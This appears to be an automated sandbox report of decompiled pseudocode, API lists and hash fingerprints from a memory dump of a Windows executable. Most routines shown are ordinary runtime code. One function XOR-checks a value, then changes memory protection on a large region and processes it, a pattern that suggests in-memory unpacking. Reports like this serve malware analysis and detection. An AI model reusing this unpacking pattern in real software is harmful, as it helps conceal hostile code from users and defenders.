                                                                        				char _v5;
                                                                        				void* __ebx;
                                                                        				void* __ecx;
                                                                        				void* __ebp;
                                                                        				intOrPtr _t25;
                                                                        				intOrPtr* _t28;
                                                                        				intOrPtr* _t29;
                                                                        				intOrPtr* _t48;
                                                                        				intOrPtr _t59;
                                                                        				intOrPtr _t60;
                                                                        				intOrPtr _t61;
                                                                        				intOrPtr _t62;
                                                                        				intOrPtr _t65;
                                                                        				void* _t66;
                                                                        				char _t67;
                                                                        				void* _t77;
                                                                        				struct HDC__* _t78;
                                                                        				void* _t79;
                                                                        				void* _t80;
                                                                        
                                                                        				_t77 = __edi;
                                                                        				_t67 = __edx;
                                                                        				if(__edx != 0) {
                                                                        					_t80 = _t80 + 0xfffffff0;
                                                                        					_t25 = E00403940(_t25, _t79);
                                                                        				}
                                                                        				_v5 = _t67;
                                                                        				_t65 = _t25;
                                                                        				E0041C1DC(_t66, 0);
                                                                        				_t28 =  *0x49591c; // 0x47a458
                                                                        				 *((intOrPtr*)(_t28 + 4)) = _t65;
                                                                        				 *_t28 = 0x45431c;
                                                                        				_t29 =  *0x495928; // 0x47a460
                                                                        				 *((intOrPtr*)(_t29 + 4)) = _t65;
                                                                        				 *_t29 = 0x454328;
                                                                        				E00454334(_t65);
                                                                        				 *((intOrPtr*)(_t65 + 0x3c)) = GetKeyboardLayout(0);
                                                                        				 *((intOrPtr*)(_t65 + 0x4c)) = E004035AC(1);
                                                                        				 *((intOrPtr*)(_t65 + 0x50)) = E004035AC(1);
                                                                        				 *((intOrPtr*)(_t65 + 0x54)) = E004035AC(1);
                                                                        				 *((intOrPtr*)(_t65 + 0x58)) = E004035AC(1);
                                                                        				 *((intOrPtr*)(_t65 + 0x7c)) = E004035AC(1);
                                                                        				_t78 = GetDC(0);
                                                                        				 *((intOrPtr*)(_t65 + 0x40)) = GetDeviceCaps(_t78, 0x5a);
                                                                        				ReleaseDC(0, _t78);
                                                                        				_t11 = _t65 + 0x58; // 0x44d3f86e
                                                                        				_t48 =  *0x495a58; // 0x496ab8
                                                                        				 *((intOrPtr*)( *_t48))(0, 0, E004507FC,  *_t11);
                                                                        				 *((intOrPtr*)(_t65 + 0x84)) = E0041F290(1);
                                                                        				 *((intOrPtr*)(_t65 + 0x88)) = E0041F290(1);
                                                                        				 *((intOrPtr*)(_t65 + 0x80)) = E0041F290(1);
                                                                        				E00454754(_t65, _t65, _t66, _t77);
                                                                        				_t15 = _t65 + 0x84; // 0x38004010
                                                                        				_t59 =  *_t15;
                                                                        				 *((intOrPtr*)(_t59 + 0xc)) = _t65;
                                                                        				 *((intOrPtr*)(_t59 + 8)) = 0x454630;
                                                                        				_t18 = _t65 + 0x88; // 0x90000000
                                                                        				_t60 =  *_t18;
                                                                        				 *((intOrPtr*)(_t60 + 0xc)) = _t65;
                                                                        				 *((intOrPtr*)(_t60 + 8)) = 0x454630;
                                                                        				_t21 = _t65 + 0x80; // 0xac000000
                                                                        				_t61 =  *_t21;
                                                                        				 *((intOrPtr*)(_t61 + 0xc)) = _t65;
                                                                        				 *((intOrPtr*)(_t61 + 8)) = 0x454630;
                                                                        				_t62 = _t65;
                                                                        				if(_v5 != 0) {
                                                                        					E00403998(_t62);
                                                                        					_pop( *[fs:0x0]);
                                                                        				}
                                                                        				return _t65;
                                                                        			}

                                                                        APIs
                                                                        Memory Dump Source
                                                                        • Source File: 00000002.00000002.749503743.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000002.00000002.749483060.0000000000400000.00000002.00020000.sdmp
                                                                        • Associated: 00000002.00000002.749763098.000000000047A000.00000004.00020000.sdmp
                                                                        • Associated: 00000002.00000002.749779338.000000000047B000.00000008.00020000.sdmp
                                                                        • Associated: 00000002.00000002.749823728.0000000000495000.00000008.00020000.sdmp
                                                                        • Associated: 00000002.00000002.749839062.0000000000496000.00000004.00020000.sdmp
                                                                        • Associated: 00000002.00000002.749850256.000000000049C000.00000002.00020000.sdmp
                                                                        Similarity
                                                                        • API ID: CapsDeviceKeyboardLayoutRelease
                                                                        • String ID:
                                                                        • API String ID: 3331096196-0
                                                                        • Opcode ID: 7cd0441e299d4dd76d954c66a31d9b821428746ca5e7d7290b214efdd2fa17c6
                                                                        • Instruction ID: b3b2c94ae3b9948f2a134b370cea85584a5ef29b9b8697dbbfd7147a4e89023a
                                                                        • Opcode Fuzzy Hash: 7cd0441e299d4dd76d954c66a31d9b821428746ca5e7d7290b214efdd2fa17c6
                                                                        • Instruction Fuzzy Hash: 873109B06112409FD740EF2ADCC1B857BE4AB05319F0490BAED08CF3A7DB7A9849DB58
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        APIs
                                                                          • Part of subcall function 00401AA0: RtlInitializeCriticalSection.KERNEL32(004965C4,00000000,00401B56,?,?,0040233A,021714A0,?,00000000,?,?,00401D29,00401D3E,00401E8F), ref: 00401AB6
                                                                          • Part of subcall function 00401AA0: RtlEnterCriticalSection.KERNEL32(004965C4,004965C4,00000000,00401B56,?,?,0040233A,021714A0,?,00000000,?,?,00401D29,00401D3E,00401E8F), ref: 00401AC9
                                                                          • Part of subcall function 00401AA0: LocalAlloc.KERNEL32(00000000,00000FF8,004965C4,00000000,00401B56,?,?,0040233A,021714A0,?,00000000,?,?,00401D29,00401D3E,00401E8F), ref: 00401AF3
                                                                          • Part of subcall function 00401AA0: RtlLeaveCriticalSection.KERNEL32(004965C4,00401B5D,00000000,00401B56,?,?,0040233A,021714A0,?,00000000,?,?,00401D29,00401D3E,00401E8F), ref: 00401B50
                                                                        • RtlEnterCriticalSection.KERNEL32(004965C4,00000000,00402308), ref: 004021D7
                                                                        • RtlLeaveCriticalSection.KERNEL32(004965C4,0040230F), ref: 00402302
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000002.00000002.749503743.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000002.00000002.749483060.0000000000400000.00000002.00020000.sdmp
                                                                        • Associated: 00000002.00000002.749763098.000000000047A000.00000004.00020000.sdmp
                                                                        • Associated: 00000002.00000002.749779338.000000000047B000.00000008.00020000.sdmp
                                                                        • Associated: 00000002.00000002.749823728.0000000000495000.00000008.00020000.sdmp
                                                                        • Associated: 00000002.00000002.749839062.0000000000496000.00000004.00020000.sdmp
                                                                        • Associated: 00000002.00000002.749850256.000000000049C000.00000002.00020000.sdmp
                                                                        Similarity
                                                                        • API ID: CriticalSection$EnterLeave$AllocInitializeLocal
                                                                        • String ID: X"~
                                                                        • API String ID: 2227675388-2380381185
                                                                        • Opcode ID: 35d58ee3540cf062b3df7ea74c26ca495e5eebe2a6b1ad0ad556c1b196560d5d
                                                                        • Instruction ID: 83bdff73d5a1a07a892888f5c36523991864ad6eb74594df81dd07f85809d88a
                                                                        • Opcode Fuzzy Hash: 35d58ee3540cf062b3df7ea74c26ca495e5eebe2a6b1ad0ad556c1b196560d5d
                                                                        • Instruction Fuzzy Hash: B941EEB2A006009FD714CF69EE85629B7A4EB65328B27427FD801E77E1E67C9C418B1C
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        C-Code - Quality: 58%
                                                                        			E00427300(int _a4) {
                                                                        				void* __ebx;
                                                                        				void* __ebp;
                                                                        				signed int _t2;
                                                                        				signed int _t3;
                                                                        				void* _t7;
                                                                        				int _t8;
                                                                        				void* _t12;
                                                                        				void* _t13;
                                                                        				void* _t17;
                                                                        				void* _t18;
                                                                        
                                                                        				_t8 = _a4;
                                                                        				if( *0x496ac4 == 0) {
                                                                        					 *0x496a9c = E00427218(0, _t8,  *0x496a9c, _t17, _t18);
                                                                        					_t7 =  *0x496a9c(_t8); // executed
                                                                        					return _t7;
                                                                        				}
                                                                        				_t3 = _t2 | 0xffffffff;
                                                                        				_t12 = _t8 + 0xffffffb4 - 2;
                                                                        				__eflags = _t12;
                                                                        				if(__eflags < 0) {
                                                                        					_t3 = 0;
                                                                        				} else {
                                                                        					if(__eflags == 0) {
                                                                        						_t8 = 0;
                                                                        					} else {
                                                                        						_t13 = _t12 - 1;
                                                                        						__eflags = _t13;
                                                                        						if(_t13 == 0) {
                                                                        							_t8 = 1;
                                                                        						} else {
                                                                        							__eflags = _t13 - 0xffffffffffffffff;
                                                                        							if(_t13 - 0xffffffffffffffff < 0) {
                                                                        								_t3 = 1;
                                                                        							}
                                                                        						}
                                                                        					}
                                                                        				}
                                                                        				__eflags = _t3 - 0xffffffff;
                                                                        				if(_t3 != 0xffffffff) {
                                                                        					return _t3;
                                                                        				} else {
                                                                        					return GetSystemMetrics(_t8);
                                                                        				}
                                                                        			}

                                                                        APIs
                                                                        • GetSystemMetrics.USER32 ref: 00427362
                                                                          • Part of subcall function 00427218: GetProcAddress.KERNEL32(745C0000,00000000), ref: 00427298
                                                                        • KiUserCallbackDispatcher.NTDLL ref: 00427328
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000002.00000002.749503743.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000002.00000002.749483060.0000000000400000.00000002.00020000.sdmp
                                                                        • Associated: 00000002.00000002.749763098.000000000047A000.00000004.00020000.sdmp
                                                                        • Associated: 00000002.00000002.749779338.000000000047B000.00000008.00020000.sdmp
                                                                        • Associated: 00000002.00000002.749823728.0000000000495000.00000008.00020000.sdmp
                                                                        • Associated: 00000002.00000002.749839062.0000000000496000.00000004.00020000.sdmp
                                                                        • Associated: 00000002.00000002.749850256.000000000049C000.00000002.00020000.sdmp
                                                                        Similarity
                                                                        • API ID: AddressCallbackDispatcherMetricsProcSystemUser
                                                                        • String ID: GetSystemMetrics
                                                                        • API String ID: 54681038-96882338
                                                                        • Opcode ID: 55446e7e76123103b454da646c455967d357e49010d04799ca10e5a3ca25f6d8
                                                                        • Instruction ID: 5b839be3fabe59c0cd91bf616db641c7d3104d278b4c8a76039aace42cce4069
                                                                        • Opcode Fuzzy Hash: 55446e7e76123103b454da646c455967d357e49010d04799ca10e5a3ca25f6d8
                                                                        • Instruction Fuzzy Hash: CBF0623171C6124AC610CA74BC855263546A75A374FE88733ED16966E1C23D9845E25D
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        C-Code - Quality: 100%
                                                                        			E0040174C(signed int __eax, void** __ecx, intOrPtr __edx) {
                                                                        				signed int _v20;
                                                                        				void** _v24;
                                                                        				void* _t15;
                                                                        				void** _t16;
                                                                        				void* _t17;
                                                                        				signed int _t27;
                                                                        				intOrPtr* _t29;
                                                                        				void* _t31;
                                                                        				intOrPtr* _t32;
                                                                        
                                                                        				_v24 = __ecx;
                                                                        				 *_t32 = __edx;
                                                                        				_t31 = __eax & 0xfffff000;
                                                                        				_v20 = __eax +  *_t32 + 0x00000fff & 0xfffff000;
                                                                        				 *_v24 = _t31;
                                                                        				_t15 = _v20 - _t31;
                                                                        				_v24[1] = _t15;
                                                                        				_t29 =  *0x4965e4; // 0x7e388c
                                                                        				while(_t29 != 0x4965e4) {
                                                                        					_t17 =  *(_t29 + 8);
                                                                        					_t27 =  *((intOrPtr*)(_t29 + 0xc)) + _t17;
                                                                        					if(_t31 > _t17) {
                                                                        						_t17 = _t31;
                                                                        					}
                                                                        					if(_t27 > _v20) {
                                                                        						_t27 = _v20;
                                                                        					}
                                                                        					if(_t27 > _t17) {
                                                                        						_t15 = VirtualAlloc(_t17, _t27 - _t17, 0x1000, 4); // executed
                                                                        						if(_t15 == 0) {
                                                                        							_t16 = _v24;
                                                                        							 *_t16 = 0;
                                                                        							return _t16;
                                                                        						}
                                                                        					}
                                                                        					_t29 =  *_t29;
                                                                        				}
                                                                        				return _t15;
                                                                        			}













                                                                        APIs
                                                                        • VirtualAlloc.KERNEL32(?,?,00001000,00000004), ref: 004017B9
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000002.00000002.749503743.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000002.00000002.749483060.0000000000400000.00000002.00020000.sdmp
                                                                        • Associated: 00000002.00000002.749763098.000000000047A000.00000004.00020000.sdmp
                                                                        • Associated: 00000002.00000002.749779338.000000000047B000.00000008.00020000.sdmp
                                                                        • Associated: 00000002.00000002.749823728.0000000000495000.00000008.00020000.sdmp
                                                                        • Associated: 00000002.00000002.749839062.0000000000496000.00000004.00020000.sdmp
                                                                        • Associated: 00000002.00000002.749850256.000000000049C000.00000002.00020000.sdmp
                                                                        Similarity
                                                                        • API ID: AllocVirtual
                                                                        • String ID: |8~
                                                                        • API String ID: 4275171209-42510566
                                                                        • Opcode ID: c9ed9fcde6cb23d72c6a0544bc66612bea3eb4eb7cb598ee75956fec592b491e
                                                                        • Instruction ID: df40b9f29fcf593a2001ebb942b006e8579671ba7d571f2f05a33fea13171e4b
                                                                        • Opcode Fuzzy Hash: c9ed9fcde6cb23d72c6a0544bc66612bea3eb4eb7cb598ee75956fec592b491e
                                                                        • Instruction Fuzzy Hash: F1118E76A04705AFC3109F29C880A2BBBE1EFD4760F16C53EE598A73A5D735AC408789
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        C-Code - Quality: 100%
                                                                        			E00454334(void* __eax) {
                                                                        				struct HICON__* _t5;
                                                                        				void* _t7;
                                                                        				void* _t8;
                                                                        				struct HINSTANCE__* _t11;
                                                                        				CHAR** _t12;
                                                                        				void* _t13;
                                                                        
                                                                        				_t13 = __eax;
                                                                        				 *((intOrPtr*)(_t13 + 0x60)) = LoadCursorA(0, 0x7f00);
                                                                        				_t8 = 0xffffffea;
                                                                        				_t12 = 0x47ab90;
                                                                        				do {
                                                                        					if(_t8 < 0xffffffef || _t8 > 0xfffffff4) {
                                                                        						if(_t8 != 0xffffffeb) {
                                                                        							_t11 = 0;
                                                                        						} else {
                                                                        							goto L4;
                                                                        						}
                                                                        					} else {
                                                                        						L4:
                                                                        						_t11 =  *0x496714; // 0x400000
                                                                        					}
                                                                        					_t5 = LoadCursorA(_t11,  *_t12); // executed
                                                                        					_t7 = E004543EC(_t13, _t5, _t8);
                                                                        					_t8 = _t8 + 1;
                                                                        					_t12 =  &(_t12[1]);
                                                                        				} while (_t8 != 0xffffffff);
                                                                        				return _t7;
                                                                        			}










                                                                        APIs
                                                                        Memory Dump Source
                                                                        • Source File: 00000002.00000002.749503743.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000002.00000002.749483060.0000000000400000.00000002.00020000.sdmp
                                                                        • Associated: 00000002.00000002.749763098.000000000047A000.00000004.00020000.sdmp
                                                                        • Associated: 00000002.00000002.749779338.000000000047B000.00000008.00020000.sdmp
                                                                        • Associated: 00000002.00000002.749823728.0000000000495000.00000008.00020000.sdmp
                                                                        • Associated: 00000002.00000002.749839062.0000000000496000.00000004.00020000.sdmp
                                                                        • Associated: 00000002.00000002.749850256.000000000049C000.00000002.00020000.sdmp
                                                                        Similarity
                                                                        • API ID: CursorLoad
                                                                        • String ID:
                                                                        • API String ID: 3238433803-0
                                                                        • Opcode ID: d761e11c61c979bdf821915641afd05efaccb41e9284a7765425020a359a9d55
                                                                        • Instruction ID: 45ff5c45349f62151306836f9853a517dcd13b5311b8dd786089dfbce635c089
                                                                        • Opcode Fuzzy Hash: d761e11c61c979bdf821915641afd05efaccb41e9284a7765425020a359a9d55
                                                                        • Instruction Fuzzy Hash: 51F0E911B00241479A50557D4CC096E3254DBC273DB210377FE79CE2F2C62D2C858159
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        C-Code - Quality: 100%
                                                                        			E004015B8(void* __eax, void** __edx) {
                                                                        				void* _t3;
                                                                        				void** _t8;
                                                                        				void* _t11;
                                                                        				long _t14;
                                                                        
                                                                        				_t8 = __edx;
                                                                        				if(__eax >= 0x100000) {
                                                                        					_t14 = __eax + 0x0000ffff & 0xffff0000;
                                                                        				} else {
                                                                        					_t14 = 0x100000;
                                                                        				}
                                                                        				_t8[1] = _t14;
                                                                        				_t3 = VirtualAlloc(0, _t14, 0x2000, 1); // executed
                                                                        				_t11 = _t3;
                                                                        				 *_t8 = _t11;
                                                                        				if(_t11 != 0) {
                                                                        					_t3 = E0040146C(0x4965e4, _t8);
                                                                        					if(_t3 == 0) {
                                                                        						VirtualFree( *_t8, 0, 0x8000);
                                                                        						 *_t8 = 0;
                                                                        						return 0;
                                                                        					}
                                                                        				}
                                                                        				return _t3;
                                                                        			}








                                                                        APIs
                                                                        • VirtualAlloc.KERNEL32(00000000,?,00002000,00000001,?,?,?,004018C1), ref: 004015E7
                                                                        • VirtualFree.KERNEL32(00000000,00000000,00008000,00000000,?,00002000,00000001,?,?,?,004018C1), ref: 0040160E
                                                                        Memory Dump Source
                                                                        • Source File: 00000002.00000002.749503743.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000002.00000002.749483060.0000000000400000.00000002.00020000.sdmp
                                                                        • Associated: 00000002.00000002.749763098.000000000047A000.00000004.00020000.sdmp
                                                                        • Associated: 00000002.00000002.749779338.000000000047B000.00000008.00020000.sdmp
                                                                        • Associated: 00000002.00000002.749823728.0000000000495000.00000008.00020000.sdmp
                                                                        • Associated: 00000002.00000002.749839062.0000000000496000.00000004.00020000.sdmp
                                                                        • Associated: 00000002.00000002.749850256.000000000049C000.00000002.00020000.sdmp
                                                                        Similarity
                                                                        • API ID: Virtual$AllocFree
                                                                        • String ID:
                                                                        • API String ID: 2087232378-0
                                                                        • Opcode ID: 9e2649f51290d73c37372646d6b2be47bcd4918fbfb34046e085b880d4026c3a
                                                                        • Instruction ID: 904b9d4922f68113b59492f8b44d46dc7ec4cb2fb37737401e8004d19412cf8b
                                                                        • Opcode Fuzzy Hash: 9e2649f51290d73c37372646d6b2be47bcd4918fbfb34046e085b880d4026c3a
                                                                        • Instruction Fuzzy Hash: 88F0E272B003202BEB205A6A0CC1B536AC49B857A4F190477B948FF3E9D67A8C0082A9
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        C-Code - Quality: 100%
                                                                        			E0047942C(void* __edi, void* __esi, void* __eflags, intOrPtr* _a4) {
                                                                        				long _v8;
                                                                        				void* __ebx;
                                                                        				void* __ecx;
                                                                        				signed int _t22;
                                                                        				signed int _t29;
                                                                        				intOrPtr* _t31;
                                                                        
                                                                        				_t31 = _a4;
                                                                        				if(E0047940C( *((intOrPtr*)( *_t31))) == 0) {
                                                                        					if(E00479418( *((intOrPtr*)( *_t31))) == 0) {
                                                                        						return 0;
                                                                        					}
                                                                        					 *((intOrPtr*)( *(_t31 + 4) + 0xb8)) = 0x479404;
                                                                        					return 0xffffffffffffffff;
                                                                        				}
                                                                        				_t22 =  *(_t31 + 4);
                                                                        				if(( *(_t22 + 0xa8) ^ 0x000ba895) != 0x9a1e0) {
                                                                        					return 0;
                                                                        				}
                                                                        				VirtualProtectEx(0xffffffff,  *(_t22 + 0xa0), 0x1415a, 4,  &_v8); // executed
                                                                        				E0047951C(_t31,  *((intOrPtr*)( *(_t31 + 4) + 0xa0)), 0x1415a, __edi, __esi, 0x1aa6f, 0x47ade0);
                                                                        				_t29 =  *(_t31 + 4);
                                                                        				 *((intOrPtr*)(_t29 + 0xb8)) =  *((intOrPtr*)(_t29 + 0xb8)) + 0x62f5;
                                                                        				return _t29 | 0xffffffff;
                                                                        			}










                                                                        APIs
                                                                        • VirtualProtectEx.KERNEL32(000000FF,?,0001415A,00000004,?), ref: 0047946C
                                                                          • Part of subcall function 0047951C: GetKeyboardType.USER32(00000000), ref: 0047958B
                                                                        Memory Dump Source
                                                                        • Source File: 00000002.00000002.749503743.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000002.00000002.749483060.0000000000400000.00000002.00020000.sdmp
                                                                        • Associated: 00000002.00000002.749763098.000000000047A000.00000004.00020000.sdmp
                                                                        • Associated: 00000002.00000002.749779338.000000000047B000.00000008.00020000.sdmp
                                                                        • Associated: 00000002.00000002.749823728.0000000000495000.00000008.00020000.sdmp
                                                                        • Associated: 00000002.00000002.749839062.0000000000496000.00000004.00020000.sdmp
                                                                        • Associated: 00000002.00000002.749850256.000000000049C000.00000002.00020000.sdmp
                                                                        Similarity
                                                                        • API ID: KeyboardProtectTypeVirtual
                                                                        • String ID:
                                                                        • API String ID: 687961724-0
                                                                        • Opcode ID: a14af51c247e0b399cf11fe92d5a90e969ef7e6e005634e7367ce840528c0a59
                                                                        • Instruction ID: fc2a89276082dc8536020b565f8470d0cf6bf16a89c644c3f15dbdb255ca1576
                                                                        • Opcode Fuzzy Hash: a14af51c247e0b399cf11fe92d5a90e969ef7e6e005634e7367ce840528c0a59
                                                                        • Instruction Fuzzy Hash: 64113031248200AFCB50DB15C981EE573A5EB46364F64C7A6E92C5F396D634EC46CB2A
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        C-Code - Quality: 77%
                                                                        			E00441B28(void* __ecx, void* __edi, void* __esi) {
                                                                        				intOrPtr _t6;
                                                                        				intOrPtr _t8;
                                                                        				intOrPtr _t10;
                                                                        				intOrPtr _t12;
                                                                        				intOrPtr _t14;
                                                                        				void* _t16;
                                                                        				void* _t17;
                                                                        				intOrPtr _t20;
                                                                        				intOrPtr _t21;
                                                                        				intOrPtr _t22;
                                                                        				intOrPtr _t23;
                                                                        				intOrPtr _t28;
                                                                        
                                                                        				_t25 = __esi;
                                                                        				_t17 = __ecx;
                                                                        				_push(_t28);
                                                                        				_push(0x441bae);
                                                                        				_push( *[fs:eax]);
                                                                        				 *[fs:eax] = _t28;
                                                                        				 *0x496b74 =  *0x496b74 - 1;
                                                                        				if( *0x496b74 < 0) {
                                                                        					 *0x496b70 = (GetVersion() & 0x000000ff) - 4 >= 0; // executed
                                                                        					_t31 =  *0x496b70;
                                                                        					E004418D8(_t16, __edi,  *0x496b70);
                                                                        					_t6 =  *0x431d0c; // 0x431d58
                                                                        					E00413838(_t6, _t16, _t17,  *0x496b70);
                                                                        					_t8 =  *0x431d0c; // 0x431d58
                                                                        					E004138D8(_t8, _t16, _t17, _t31);
                                                                        					_t21 =  *0x431d0c; // 0x431d58
                                                                        					_t10 =  *0x443240; // 0x44328c
                                                                        					E00413884(_t10, _t16, _t21, __esi, _t31);
                                                                        					_t22 =  *0x431d0c; // 0x431d58
                                                                        					_t12 =  *0x441bb8; // 0x441c04
                                                                        					E00413884(_t12, _t16, _t22, __esi, _t31);
                                                                        					_t23 =  *0x431d0c; // 0x431d58
                                                                        					_t14 =  *0x441d6c; // 0x441db8
                                                                        					E00413884(_t14, _t16, _t23, _t25, _t31);
                                                                        				}
                                                                        				_pop(_t20);
                                                                        				 *[fs:eax] = _t20;
                                                                        				_push(0x441bb5);
                                                                        				return 0;
                                                                        			}
















                                                                        APIs
                                                                        • GetVersion.KERNEL32(00000000,00441BAE), ref: 00441B42
                                                                          • Part of subcall function 004418D8: GetCurrentProcessId.KERNEL32(?,00000000,00441A50), ref: 004418F9
                                                                          • Part of subcall function 004418D8: GlobalAddAtomA.KERNEL32 ref: 0044192C
                                                                          • Part of subcall function 004418D8: GetCurrentThreadId.KERNEL32 ref: 00441947
                                                                          • Part of subcall function 004418D8: GlobalAddAtomA.KERNEL32 ref: 0044197D
                                                                          • Part of subcall function 004418D8: RegisterClipboardFormatA.USER32 ref: 00441993
                                                                          • Part of subcall function 004418D8: GetModuleHandleA.KERNEL32(USER32,00000000,00000000,?,00000000,?,00000000,00441A50), ref: 00441A17
                                                                          • Part of subcall function 004418D8: GetProcAddress.KERNEL32(00000000,AnimateWindow), ref: 00441A28
                                                                        Memory Dump Source
                                                                        • Source File: 00000002.00000002.749503743.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000002.00000002.749483060.0000000000400000.00000002.00020000.sdmp
                                                                        • Associated: 00000002.00000002.749763098.000000000047A000.00000004.00020000.sdmp
                                                                        • Associated: 00000002.00000002.749779338.000000000047B000.00000008.00020000.sdmp
                                                                        • Associated: 00000002.00000002.749823728.0000000000495000.00000008.00020000.sdmp
                                                                        • Associated: 00000002.00000002.749839062.0000000000496000.00000004.00020000.sdmp
                                                                        • Associated: 00000002.00000002.749850256.000000000049C000.00000002.00020000.sdmp
                                                                        Similarity
                                                                        • API ID: AtomCurrentGlobal$AddressClipboardFormatHandleModuleProcProcessRegisterThreadVersion
                                                                        • String ID:
                                                                        • API String ID: 3775504709-0
                                                                        • Opcode ID: 4af7d1e06e4179856b6cb7255ac9413e9ea182c3b4e7439e21792739542dd09b
                                                                        • Instruction ID: 2f7da0d823e8454f170ce9909db3841dc0363cc31ad963a92fe894f2ea070a63
                                                                        • Opcode Fuzzy Hash: 4af7d1e06e4179856b6cb7255ac9413e9ea182c3b4e7439e21792739542dd09b
                                                                        • Instruction Fuzzy Hash: C1F0497D6441809FD705FF2AFC52818B7B4E7467463A191BBF80093A32D638B981CB5D
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        C-Code - Quality: 100%
                                                                        			E0040733E(CHAR* __eax, long __ecx, CHAR* __edx, void* _a4, struct HINSTANCE__* _a8, struct HMENU__* _a12, struct HWND__* _a16, int _a20, int _a24, int _a28, int _a32) {
                                                                        				struct HWND__* _t10;
                                                                        
                                                                        				_t10 = CreateWindowExA(0, __eax, __edx, __ecx, _a32, _a28, _a24, _a20, _a16, _a12, _a8, _a4); // executed
                                                                        				return _t10;
                                                                        			}





                                                                        APIs
                                                                        Memory Dump Source
                                                                        • Source File: 00000002.00000002.749503743.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000002.00000002.749483060.0000000000400000.00000002.00020000.sdmp
                                                                        • Associated: 00000002.00000002.749763098.000000000047A000.00000004.00020000.sdmp
                                                                        • Associated: 00000002.00000002.749779338.000000000047B000.00000008.00020000.sdmp
                                                                        • Associated: 00000002.00000002.749823728.0000000000495000.00000008.00020000.sdmp
                                                                        • Associated: 00000002.00000002.749839062.0000000000496000.00000004.00020000.sdmp
                                                                        • Associated: 00000002.00000002.749850256.000000000049C000.00000002.00020000.sdmp
                                                                        Similarity
                                                                        • API ID: CreateWindow
                                                                        • String ID:
                                                                        • API String ID: 716092398-0
                                                                        • Opcode ID: 80272dabcd13070f2b0510fd908a943113dc0608c8ac620f3197796e7cfed276
                                                                        • Instruction ID: 3ae3b0bb6aa290208680c541b8da8ad6351dd4405c79d6abd1241d14a227bfc1
                                                                        • Opcode Fuzzy Hash: 80272dabcd13070f2b0510fd908a943113dc0608c8ac620f3197796e7cfed276
                                                                        • Instruction Fuzzy Hash: A7E002B2204309BFEB00DE8ADCC1DABB7ACFB4C654F854115BB1C97242D275AD608B71
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        C-Code - Quality: 100%
                                                                        			E00407340(CHAR* __eax, long __ecx, CHAR* __edx, void* _a4, struct HINSTANCE__* _a8, struct HMENU__* _a12, struct HWND__* _a16, int _a20, int _a24, int _a28, int _a32) {
                                                                        				struct HWND__* _t10;
                                                                        
                                                                        				_t10 = CreateWindowExA(0, __eax, __edx, __ecx, _a32, _a28, _a24, _a20, _a16, _a12, _a8, _a4); // executed
                                                                        				return _t10;
                                                                        			}





                                                                        APIs
                                                                        Memory Dump Source
                                                                        • Source File: 00000002.00000002.749503743.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000002.00000002.749483060.0000000000400000.00000002.00020000.sdmp
                                                                        • Associated: 00000002.00000002.749763098.000000000047A000.00000004.00020000.sdmp
                                                                        • Associated: 00000002.00000002.749779338.000000000047B000.00000008.00020000.sdmp
                                                                        • Associated: 00000002.00000002.749823728.0000000000495000.00000008.00020000.sdmp
                                                                        • Associated: 00000002.00000002.749839062.0000000000496000.00000004.00020000.sdmp
                                                                        • Associated: 00000002.00000002.749850256.000000000049C000.00000002.00020000.sdmp
                                                                        Similarity
                                                                        • API ID: CreateWindow
                                                                        • String ID:
                                                                        • API String ID: 716092398-0
                                                                        • Opcode ID: f8749ca0a26f364fac6116af4e158c42e39b8565b85338519646d0319e4c55ad
                                                                        • Instruction ID: 109ed22ea2e506524b14edc0d0bd377e8b92066772ad28182da1425e8690dcbf
                                                                        • Opcode Fuzzy Hash: f8749ca0a26f364fac6116af4e158c42e39b8565b85338519646d0319e4c55ad
                                                                        • Instruction Fuzzy Hash: F7E002B2204309BFDB00DE8ADCC1DABB7ACFB4C654F854105BB1C972429275AD608B71
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        C-Code - Quality: 100%
                                                                        			E00405A64(void* __eax) {
                                                                        				char _v272;
                                                                        				intOrPtr _t14;
                                                                        				void* _t16;
                                                                        				intOrPtr _t18;
                                                                        				intOrPtr _t19;
                                                                        
                                                                        				_t16 = __eax;
                                                                        				if( *((intOrPtr*)(__eax + 0x10)) == 0) {
                                                                        					_t3 = _t16 + 4; // 0x400000
                                                                        					GetModuleFileNameA( *_t3,  &_v272, 0x105);
                                                                        					_t14 = E00405CA0(_t19); // executed
                                                                        					_t18 = _t14;
                                                                        					 *((intOrPtr*)(_t16 + 0x10)) = _t18;
                                                                        					if(_t18 == 0) {
                                                                        						_t5 = _t16 + 4; // 0x400000
                                                                        						 *((intOrPtr*)(_t16 + 0x10)) =  *_t5;
                                                                        					}
                                                                        				}
                                                                        				_t7 = _t16 + 0x10; // 0x400000
                                                                        				return  *_t7;
                                                                        			}









                                                                        APIs
                                                                        • GetModuleFileNameA.KERNEL32(00400000,?,00000105,00000001,004104D0,00405ACC,00406578,0000FF99,?,00000400,?,004104D0,004141B7,00000000,004141DC), ref: 00405A82
